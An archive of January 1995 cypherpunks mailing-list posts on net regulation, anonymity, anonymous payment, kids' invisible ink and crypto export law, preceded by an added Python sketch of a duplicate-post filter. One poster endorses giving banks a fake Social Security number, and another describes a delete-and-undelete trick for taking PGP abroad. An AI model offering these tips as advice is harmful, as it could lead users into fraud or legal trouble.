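Hal's idea of a newsreader that recognises copies of a post it has already shown, sketched as an added example (not part of the original message and not taken from any real newsreader). The `SeenFilter` class, the shingle size, the similarity threshold and the sample articles are all assumptions constructed for illustration.

```python
import re
from email import message_from_string

SHINGLE = 4        # words per shingle (assumed value)
THRESHOLD = 0.8    # Jaccard similarity treated as "same post" (assumed value)


def shingles(body):
    """Return the set of overlapping word 4-grams of an article body,
    ignoring case, punctuation, quoted lines and the signature block."""
    kept = []
    for line in body.splitlines():
        if line.rstrip() == "--":      # "-- " signature delimiter: stop here
            break
        if line.startswith(">"):       # quoted text is not the poster's own
            continue
        kept.append(line)
    words = re.findall(r"[a-z0-9]+", " ".join(kept).lower())
    if len(words) < SHINGLE:
        return frozenset([" ".join(words)]) if words else frozenset()
    return frozenset(" ".join(words[i:i + SHINGLE])
                     for i in range(len(words) - SHINGLE + 1))


def jaccard(a, b):
    """Similarity of two shingle sets: |intersection| / |union|."""
    if not a or not b:
        return 0.0
    return len(a & b) / len(a | b)


class SeenFilter:
    """Reader-side filter: nothing is cancelled, copies are just hidden."""

    def __init__(self):
        self.ids = set()      # Message-IDs already shown
        self.bodies = []      # shingle sets of articles already shown

    def classify(self, raw):
        msg = message_from_string(raw)
        mid = msg.get("Message-ID", "").strip()
        # A true cross-post is one article with one Message-ID listed in
        # several groups, so the ID alone identifies it.
        if mid and mid in self.ids:
            return "crosspost"
        if mid:
            self.ids.add(mid)
        # Individually posted copies carry fresh Message-IDs, so compare
        # the content against everything shown so far.
        sh = shingles(msg.get_payload())
        if any(jaccard(sh, old) >= THRESHOLD for old in self.bodies):
            return "duplicate"
        self.bodies.append(sh)
        return "new"


def article(mid, groups, body):
    """Build a minimal article: headers, blank line, body."""
    return (f"Message-ID: {mid}\nNewsgroups: {groups}\n"
            f"Subject: test\n\n{body}")


# Constructed sample text, not real Usenet traffic.
AD = ("Apply now for the visa lottery. Our firm will file your entry\n"
      "for a fee. Write to us today for details.\n-- \nExample Firm\n")
AD_VARIANT = ("APPLY NOW for the visa lottery!!  Our firm will file your\n"
              "entry for a fee.   Write to us today for details please.\n")
OTHER = ("Has anyone compared key sizes for the new release? I am seeing\n"
         "slow signature checks on my machine.\n")


def run_demo():
    """Feed the reader four articles in the order a user would meet them."""
    reader = SeenFilter()
    crossposted = article("<3@example.invalid>", "misc.test,rec.test", OTHER)
    feed = [
        article("<1@example.invalid>", "misc.test", AD),
        article("<2@example.invalid>", "rec.test", AD_VARIANT),  # bot copy
        crossposted,   # first seen in misc.test
        crossposted,   # met again in rec.test
    ]
    return [reader.classify(a) for a in feed]


if __name__ == "__main__":
    print(run_demo())
```

The Message-ID check alone handles cross-posts; the content comparison is what catches copies posted one group at a time.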




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access3.digex.net>
Date: Tue, 3 Jan 95 11:55:53 PST
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
Message-ID: <Pine.SUN.3.91.950103145123.9894B-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Sandy Sandfort wrote:

> Date: Tue, 3 Jan 1995 10:58:09 -0800 (PST)
> From: Sandy Sandfort <sandfort@crl.com>
> To: Cypherpunks <cypherpunks@toad.com>
> Subject: SAN FRANCISCO EDITORIAL
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> Here is a guest editorial that ran in Monday's SF Chronicle.  It
> should make your blood boil.
> 
> 
>  S a n d y
> 
> 			*	*	*
> 
>              ANARCHY, CHAOS ON THE INTERNET MUST END


[Trash about mob rule, and the need for international diplomacy (Read U.S. 
imposition of local law to foreign sovereigns) to correct the problem, 
happily deleted.]


> 
> Martha S. Siegel is the author of ``How to Make a Fortune on the
                                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

> Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. 
  ^^^^^^^^^^^^^^^^^^^^^^^^              ^^^^^^^^^

I guess anonymous posting abilities just kill the internet direct mail 
business hmmmm?

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Goren <ben@Tux.Music.ASU.Edu>
Date: Tue, 3 Jan 95 14:45:02 PST
To: cypherpunks@toad.com
Subject: Re: Stegno for Kids
In-Reply-To: <Pine.ULT.3.91.950103140953.24233A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.3.89.9501031508.A2786-0100000@Tux.Music.ASU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Lemon juice makes a good invisible ink for kids. Write the message; heat 
the paper to reveal it. I used a match, but I suspect a hairdryer would 
be much more sensible.

b&




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marsha-w@uiuc.edu (Marsha-W)
Date: Tue, 3 Jan 95 13:52:15 PST
To: cypherpunks@toad.com
Subject: LAW AND ETHICS ON THE "NETS"
Message-ID: <ab2f9292150210048e24@[128.174.91.111]>
MIME-Version: 1.0
Content-Type: text/plain


Looks like more of a push for regulation:  Charles Bell
thought you all might have something to say about this...
------------------------------------------------------------------------------
              ABA SCI/TECH SECTION, IPPP COMMITTEE
                  LAW AND ETHICS ON THE "NETS"
                        December 8, 1994

     The John Marshall Law School's Center for Informatics Law, in
conjunction with the ABA Section of Science & Technology Committee
on Information Practices, Policies, and Privacy, is undertaking a
project entitled, "Law and Ethics on the 'Nets'" (LEON).

     The development of a national information infrastructure and
a global electronic network, of which Internet is the backbone, has
presented a multitude of legal and ethical problems involving use
and abuse of the networks, nationally and worldwide.  Almost on a
daily basis, news items announce electronic network transmissions
constituting hate mail, profanity, vulgarity, obscenity, child
pornography, sexual harassment, defamation and invasion of privacy.

The violation of intellectual property rights and information
system security are also frequent occurrences.  National and
international discussions consider such questions as what "rules of
the road" ought to apply, who can make them, how can they be
enforced, and what will be the legal and political relationships
between states and nations regarding cyberspace?  It is argued that
at present the lawless, the intolerant and the disrespectful seem
able to pollute the worldwide information stream with little
constraint.

     Certainly, the current state of anarchy in national and global
electronic networks cannot continue if the technology is to achieve
the remarkable benefits that have been predicted in terms of
communications among institutions and individuals, whether
government, business or society at large.  The purpose of the
CIL/S&T project is to promote a dialogue that can lead to
recommendations for treating with the many issues at hand.

     We solicit the participation of the Sci/Tech IPPP Committee
(and interested others!) in addressing the foregoing issues.
Please send me your expression of interest -- indicating what
specific aspects of the various questions you would like to
address, and then I'll organize us into some working groups.
PLEASE LET ME KNOW YOUR INTERESTS BY JANUARY 9, 1995, SO WE CAN
STRUCTURE THE PROJECT AND PROMPTLY GET UNDER WAY.

     We plan a program on the project for the ABA annual meeting in
Chicago next August, and we hope to generate a publication for the
Section concerning the project results.


George B. Trubow, Professor of Law
Director, Center for Informatics Law
The John Marshall Law School
315 S. Plymouth Ct.
Chicago, IL 60604-3907
Fax: 312-427-8307; Voice: 312-987-1445
E-mail: 7trubow@jmls.edu




Marsha Woodbury     marsha-w@uiuc.edu    U of Illinois/Urbana-Champaign
FAX 217-356-7050        Home 217-337-0001       Work 217-244-0780
http://www.cpsr.org/dox/global.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Tue, 3 Jan 95 12:55:30 PST
To: cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
Message-ID: <199501032101.QAA27544@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Forwarded message:
- From dcwill@python.ee.unr.edu Tue Jan  3 11:52:23 1995
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Message-Id: <199501031952.LAA04685@python.ee.unr.edu>
Subject: Re: Press attack on anonymity.
To: asgaard@sos.sll.se (Mats Bergstrom)
Date: Tue, 3 Jan 1995 11:52:15 -0800 (PST)
Cc: dcwill@python.ee.unr.edu (Dr. D.C. Williams, P.E.)
In-Reply-To: <Pine.HPP.3.91.950103194933.7114A-100000@cor.sos.sll.se> from "Mats Bergstrom" at Jan 3, 95 08:05:49 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 842       

Mats Bergstrom wrote:

> Since Joe User doesn't really
> care if he can connect anonymously or not, at least not yet,
> they might very well succeed in making some aspects of anonymity
> 'illegal'. But who cares, if anonymous agents can't be traced?

Because then the last, unstoppable act of the State will be to clamp
down on anonymous agents.

See "How to Boil Live Frogs". You can't dump them into boiling water
because they will jump out. Instead, start at a comfortable temperature
and turn up the heat a little bit at a time. Eventually, the frogs become
unable to escape and are lulled to their unconscious death. I equate "making 
some aspects 'illegal'" with increasing the water temperature. 

To paraphrase an oft-seen .sig from this list:

"Seldom is freedom of any kind lost all at once."


=D.C. Williams	<dcwill@ee.unr.edu>


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwm6/ioZzwIn1bdtAQGuRwGAobH2lCXDIHUCitG1mcI0RasjMOWjovT2
xUpa1Xta/mphm/s+2H21f7kuFvY6smcn
=wclb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raph@netcom.com (Raph Levien)
Date: Tue, 3 Jan 95 16:59:09 PST
To: cypherpunks@toad.com
Subject: Siegel and Lewis
Message-ID: <199501040022.QAA21291@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



   I just got off the phone with Peter Lewis, reporter for the New
York Times. He is unaware of any grand conspiracy to regulate the Net,
but then again if there was one, I don't think they'd tell him.

   His piece that ran Saturday was badly mangled by the editorial
process, especially since it ran on page one. Those articles get to be
mangled by a whole new set of people who otherwise wouldn't get to
touch it. I think Lewis has basically good intentions, and does do his
homework before writing a story.

   Yecchh. Now I know why I don't rely on daily newspapers for my news
(the Internet keeps me up on the fast-breaking stuff, and the
Economist fills me in on the rest). The fact that most people rely on
papers and the even worse TV news does not bode well.

   Martha Siegel is just fucked up enough that she will probably push
for legislation regulating the nets. Congress is just fucked up enough
that they might pass it.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Tue, 3 Jan 95 14:37:58 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: calls for regulation
In-Reply-To: <ab2f9292150210048e24@[128.174.91.111]>
Message-ID: <Pine.3.89.9501031601.A517-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



	This is pretty scary, I mean it always sat in the back of my mind 
that they would attempt to regulate the net, and to pass legislation and 
all, but now that it is rearing its head and looks like there is going 
to be a push for it, I am actually concerned, to the point of fear 
almost.  Not a paralyzing fear, but a definite feeling that action is 
necessary now to either head it off, or provide for alternative forms of 
communication on the Net if it does come.  Thank goodness the cypherpunks 
have been working on crypto, it is at least deployed enough now that any 
attempt to control that would entail drastic measures, like REALLY 
drastic. 

	I think perhaps we should make a concerted effort to alert the 
rest of the net of these happenings, and to tell them to contact their 
legislators and such to try and stop it, or at least attempt to stop the 
hysteria that these articles will drum up in Congress.  Perhaps 
someone will be kind enough to write a "newsletter" or a post to be spread 
throughout Usenet and other BBS's and mailing lists (under control, not 
spamming or anything) that alerts people on what is happening, and what 
they can do about it. I am afraid I am too inexperienced as a writer of 
such things, I could do it, but I am sure that others here would do much 
better jobs of it, and thus influence more action from the people on the 
net. 

Get on your boots fellas, load your guns too.  Looks like a war is 
starting up, or is it a police action 8)

i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com> (by way of marsha-w@uiuc.edu (Marsha-W))
Date: Tue, 3 Jan 95 14:34:18 PST
To: cypherpunks@toad.com
Subject: Re: LAW AND ETHICS ON THE "NETS"
Message-ID: <ab2f9e6d1c0210045754@[128.174.91.111]>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Thanks to Marsha-W for telling us about the "Law and Ethics on
the 'Nets'" project being organized at the John Marshall Law
School.  I'm signing up.  I think ALL of us should, if you get
my drift.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 3 Jan 95 14:01:58 PST
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103134419.1971A-100000@crl.crl.com>
Message-ID: <9501032202.AA13835@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Sandy Sandfort says:
> Gosh, my education seems to be remiss with regard to the case/
> incidents referred to.  Could someone let us know who this person
> is and what her claim to fame is?  (It certainly isn't her logic
> or writing ability.)

Martha is a de facto disbarred attorney, who, along with her equally
slimy hubby, also a de facto disbarred attorney (both resigned from
the Florida bar for ethical violations rather than be disbarred),
began posting to every group on Usenet a scummy ad explaining that if
people would only pay them a bunch of money they would file entries
into last year's green card lottery for their clients, who, of course,
could have simply sent their letters in on their own for free. The net
reacted rather violently to their spamming, because unlike most
rational individuals they contended that they were doing something
perfectly decent and honest. People stopped them in the long run by
rigging up cancelbots to administer the Usenet death penalty to them.

No one would be giving them a shred of respect, except for the fact
that a certain New York Times reporter named Peter Lewis appeared to
miss the point in certain articles he published about the incident.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Tue, 3 Jan 95 17:24:48 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501031745.JAA09281@jobe.shell.portal.com>
Message-ID: <Pine.NXT.3.91.950103170912.6430A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Hal wrote:

> >   I don't see why a debit card couldn't be anonymous, even to the point 
> > of having no name, AND no picture on it. Yes, the bank has the money, but 
> > their only obligation is to dish it out to the vendors/ATMs that you have 
> > used your card with. Why should a bank care who you are once they have 
> > your money in the account.
> 
> Again, it is unclear here whether you are proposing that you would be
> anonymous to the bank or just have a blank card.  As I wrote, banks are

  I'm aiming towards anonymous from everyone. The vendor, and the bank. 

> required to get SS#'s for depositors right now, and I wouldn't expect
> that to change any time soon.  If anything, the trend appears to be
> towards more tightening rather than less.  Duncan and/or Sandy have
> suggested giving a fake SS# when you open your secured account; maybe
> that would be legal but it sounds questionable to me.

  I guess I'm being a little too unrealistic about my wishes. In my 
ideal case the IRS and the government would have nothing to do with the 
bank. Fake SS# is a good idea, but no one seems to know exactly how legal 
this is. They could, for example, claim that you were trying to defraud 
the bank and/or the IRS.

> I used my VISA yesterday, and after swiping it through the now-ubiquitous
> card readers the vendor was required by the machine to manually enter the
> last four digits on the card.  He complained that this was something new
> and was happening very frequently now (maybe a change with 1995?).  I

  I hadn't heard of this. It's been a couple of years since I've had a 
VISA card.

> have heard of fraud where people make fake VISA cards (or steal them) and
> re-program the mag stripe to have a different number than what is on the
> front.  Maybe this is a countermeasure for that.  It doesn't sound like a
> blank card is the direction the industry is going.  Does anyone have more
> info on this change?

  That's why I suggested the blank card (no embossing). Without that it 
makes it more difficult to get your card number. I envision a transaction 
like so:

  1. Card is swiped and the database is checked for your card # and 
enough balance for the purchase.
  
  2. If authorized, a receipt is printed without card #.

  To get your card # the criminal has to either intercept the transaction 
with the database (not too hard), or compromise the database itself.

  As long as you keep your card physically secure you should be reasonably 
secure.

      Brian

P.S. I apologize for any misspellings or missing chars. My 
ISP(seanet.com) misses incoming characters when more than 3 sz sessions 
are running.

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 3 Jan 95 18:31:51 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <199501032006.AA04977@poboy.b17c.ingr.com>
Message-ID: <950103.173130.6M1.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, perobich@ingr.com writes:

> Despite the odiousness of the source, might it be a Good Thing to get
> a law giving ISPs common-carrier status passed? 
> 
> When you're a common carrier, no one hassles you about the content you
> pass-- this would make it much easier for anon remailers to flourish.

I can't speak for ISPs in general, but when I still ran a public-access
system, the absolute last thing I wanted was to be thought of as a
common carrier.  While common carriers are held blameless for the
content of traffic they pass, they are also heavily regulated.  In
general, a common carrier may not refuse to provide services unless
special circumstances exist.  Want to bet Usenet abuse won't be one of
those circumstances?  Spammers would love such a state of affairs.  (and
remember who wrote that whine)

I'm for keeping regulation out of the Inet whenever and wherever
possible.
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
                    PGP public key available by mail
     echo /get /pub/pubkey.asc | mail file-request@cybrspc.mn.org
         These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwnfPxvikii9febJAQF/QwQAuwj1FBH/Dcx0eG6gES6DB0cxYroSHkCe
L1QP67dyjtyQ+DGIV/+JLUJuAuszmNenzv2dqUL//Nmp5dpLqVSTm2n4D6cGrs3/
YlU0J1TixBnoPMkOKFs18czBQRw/ezSH9tnCKQ0PFf+f1Se/tvS3htOxohkKPpGe
7g85dDm4wow=
=slH/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Tue, 3 Jan 95 17:49:51 PST
To: jamesd@netcom.com
Subject: Re:  Press attack on anonymity.
Message-ID: <199501040143.RAA22066@art.net>
MIME-Version: 1.0
Content-Type: text/plain


Or perhaps it is someone at HotWired... :)

-lile




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Arachelian <aarach01@barney.poly.edu>
Date: Tue, 3 Jan 95 15:01:47 PST
To: sal@panix.com
Subject: rarachel - no email
Message-ID: <Pine.3.89.9501031742.A939-0100000@barney>
MIME-Version: 1.0
Content-Type: text/plain


Hey guys,

It's me.  Don't let the new account name, and the horrible name of this 
despicable machine throw you off.  It's me, Ray Arachelian.  Some rat(s?) 
hacked into photon, the machine where my home account lives, and now, 
while I can read my prism email by going through major acrobatic 
maneuvers, I have to use this slimy shitty student account.

So for the time being, please direct any mail to this account 
aarach01@barney.poly.edu (God I hate this machine's name!)  I'll still be 
able to read anything you send to prism for the time being (during 
winter recess they said.)

See, I have to log in to barney, ftp my mailbox over from prism, telnet 
to barney and delete my mailbox, and then read it with pine... :-(

[Eileen, could you at least build a home directory for my old account 
with a .forward to Barney for now?  Or just let me use prism without 
having to have photon connected to it?]


Thanks,
-- Ray (Arsen) Arachelian.
 [also known as rarachel@prism/photon.poly.edu, RayDude@aol.com, etc.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Arachelian <aarach01@barney.poly.edu>
Date: Tue, 3 Jan 95 15:06:31 PST
To: "David K. Merriman" <merriman@metronet.com>
Subject: Re: Comdex Disks?
In-Reply-To: <199412272331.AA09920@metronet.com>
Message-ID: <Pine.3.89.9501031828.A939-0100000@barney>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 27 Dec 1994, David K. Merriman wrote:

> Back some time ago, there was some discussion of giving away disks at Comdex
> in NY; by any chance, does anyone have a copy of the contents of what was on
> those disks?  I'd like to be able to give away 'basic info' in
> easy-to-handle format :-)

That was my puppy.  My friend Sal@panix and I gave the disks away at 
PC-EXPO and at various other events.   I have the latest disk version of 
it if you want it, but you'll need to update PGP on the disk and maybe 
include/add/remove some articles from the articles package.

You can call me at 212-618-8818 (work) or email me here, but with the 
situation with my account, call me instead.  (And that goes for anyone 
else on the list willing to send diskettes out.  Please don't call me 
if you aren't going to give out disks and are just interested in a copy.  
You can ftp the old copies from somewhere in Canada...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Tue, 3 Jan 95 18:48:58 PST
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <Chameleon.4.01.950103184124.jcorgan@>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>No reason to risk a hassle by exporting PGP from the US on your 
>laptop, it's everywhere.  Just take your Secret Keyring file and 
>download PGP from a foreign FTP site once you are out of the US.

Or you can do what someone mentioned to me he does when he travels
abroad: He keeps PGP and his keyrings on a floppy, but then _deletes_
PGP.EXE.  Of course, being a good PC user, he _always_ carries a copy 
of Norton Undelete with him :)

Quite creative, IMHO, and technically legal.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov
WWW: (for now)      ftp://ftp.netcom.com/pub/jc/jcorgan/www/homepage.htm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwoKl01Diok8GKihAQH00gP/VLWJaDaS7DNp+bv1BLszEQpOlNFyS22Y
BL+Wv8Rs5efF2SG5t3E+6aHwSvaRigtjE1wwF3f46QY23ZnO1x+DTuEXy9gBRu+s
usNniiyfcozfT90wPU79b/qhRrnM/Uzwxn8XddWNz0ONEk/QZqXLLx/4PdczwDaN
L5XclEMG8n4=
=Kzyl
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 3 Jan 95 19:06:00 PST
To: Brian Lane <blane@seanet.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.NXT.3.91.950103170912.6430A-100000@kisa>
Message-ID: <Pine.SUN.3.91.950103190506.3503B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know about the rest of these suggestions, but I am reasonably 
sure that using a fake social security number is a violation of federal 
law -- no matter what the user's motivation may have been.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:08:20 PST
To: cypherpunks@toad.com
Subject: Re: Phil's Plight
Message-ID: <9501031808.AA21529@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> I think Phil deserves better than the
> silence his plight has received as of late.

True.

But would it be good or bad help if something other
than silence came from outside the USA?

I mean if the rest of the world says they love
him, the attorney will say "yes, of course. Therefore
he gets sued." :-(

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:10:03 PST
To: cypherpunks@toad.com
Subject: Re: Why I have a 512 bit PGP key
Message-ID: <9501031809.AA21532@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> A compiler can recognize one specific piece of code or a few 
> specific pieces of code and do something perverse.  It cannot 
> recognize functionally equivalent code, this
> being a high order artificial intelligence problem.

It's enough to recognize DES tables or PGP procedures.

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:20:27 PST
To: cypherpunks@toad.com
Subject: Re: Why I have a 512 bit PGP key
Message-ID: <9501031819.AA21541@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> While it's likely that a sysadmin could hack the kernel to substitute
> bogus MD5 hashes, doing so in certain environments could earn the sysadmin a
> quick exit from employment.  

If it wasn't the reason he was employed for. 

In Germany it is not allowed to spy on someone else's phone calls. (Is it 
in the USA?)  But some cases became public where employees of several companies
got their phones tapped. It was done to find out whether they make private
phone calls or what they say in private phone calls.

Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Tue, 3 Jan 95 19:36:39 PST
To: cypherpunks@toad.com
Subject: RE: Edupage 1/3/95
Message-ID: <Chameleon.4.01.950103193739.jcorgan@>
MIME-Version: 1.0
Content-Type: text/plain


Some selected articles from Educom that may interest you...

***************************************************************************
Edupage, a summary of news items on information technology, is provided
three times each week as a service by Educom -- a Washington, D.C.-based
consortium of leading colleges and universities seeking to transform
education through the use of information technology. 
***************************************************************************

CYBERPHOBICS GALORE
A recent Gallup poll conducted for MCI shows almost half of the 600 white
collar respondents admitting they are cyberphobic or resistant to new
technology. More than a third do not use a computer at all, either at home
or at work, and nearly 60% don't use voice mail. Two thirds do not use
e-mail at work, and about the same number don't carry a pager. The most
common reason cited for anti-technology attitudes was a fear of loss of
privacy. Close runners up were worries over information overload and a fear
of losing face-to-face contact with associates. (Miami Herald 1/2/95 p.22) 

MORE INTERNET FACTS
Traffic on the NSFnet grew a whopping 110% in 1994, and the number of
countries online increased from approximately 137 in 1993 to approximately
159 this past year. There were 1,964 phone calls to InterNIC Registration
Services during November '94. For more facts, check out
http://www.openmarket.com/info/internet-index/current-sources.html. (The
Internet Index, Number 5)

"GIVE US YOUR MONEY, BUT KEEP YOUR OPINIONS TO YOURSELF!"
A survey of small business executives conducted for IBM by Roper Starch
Worldwide shows 65% of the respondents saying that building the information
highway is a good use of government funds, but only 3% think the government
should have "a lot" of influence on how the highway operates. Forty-four
percent felt the government should have no influence, and 49% said they
thought it should have "some" say in how things were run. (Inc. Technology
Premiere Issue p.19)

THE WIRED REVOLUTION
While saluting Wired magazine's worthy premise as a publication that
addresses the social and cultural effects of digital technologies, the
director of the 21st Century Project at the University of Texas blasts
Wired for its "fevered, adolescent consumerism, its proud display of empty
thoughts from a parade of smoke-shoveling celebrity pundits, its smug
disengagement from the thorny problems facing postindustrial societies, and
most annoyingly, its over-the-top narcissism. If this is the revolution, do
we really want to be part of it?" (New Republic 1/9-16/95 p.19)

************************************************************************
EDUPAGE is what you've just finished reading. To subscribe to Edupage: send
a message to: listproc@educom.edu and in the BODY of the message type:
subscribe edupage Sidney Carlton (assuming that your name is Sidney
Carlton; if it isn't, substitute your own name) ... To cancel subscription
to Edupage: send a message to: listproc@educom.edu and in the BODY of the
message type: unsubscribe edupage.    
************************************************************************
Educom    --     Transforming Education Through Information Technology
************************************************************************
Written by John Gehl & Suzanne Douglas. V: 404-371-1853. F: 404-371-8057

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:34:08 PST
To: cypherpunks@toad.com
Subject: Re: Stegno for Kids
Message-ID: <9501031834.AA21554@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> and Crayola brand
> secret writing pens (WOW!!!!). There are about 8 pens in the set. You write
> secretly with two of them and develop the image with the other six.

I had something like that as a toy about 20 years ago. A single pen with
tips on both sides. One to write, the other to develop. Didn't they have it
in America also?

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:38:49 PST
To: cypherpunks@toad.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <9501031838.AA21557@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



What do I have to do if I want to bring cryptographic 
equipment _into_ the USA temporarily (for use or demo) and
want to take it back home after some days or weeks? 

Since I am in America then, I am under American law. 
The _export_ of my own crypto stuff is not temporary. 

Does the American law allow me (a foreigner!) to take
out any cryptographic material, even if it is my own thing?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 03:08:58 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
Message-ID: <gate.T1oDyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Sandy posted Martha "Spam" Siegel's SF Chronicle editorial. If it boiled 
anyone's blood quite enough to write a letter to the paper on both the author's
background as well as the unconstitutionality of her 'solutions', I'd be happy
to sign my name in support.

BTW while paranoia is good for C'punks, I don't see a hidden plot in the
recent media coverage of anonymity. The media likes 'hot' issues, and have
flogged the other one - kiddie porn - to death. Everyone from Newsweek to 
The Economist mentioned pedophilia, simply because it grabs attention more
than global K-12 projects conducted over the net, just as anonymity grabs 
more attention in relation to crime than to sexual abuse recovery groups.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
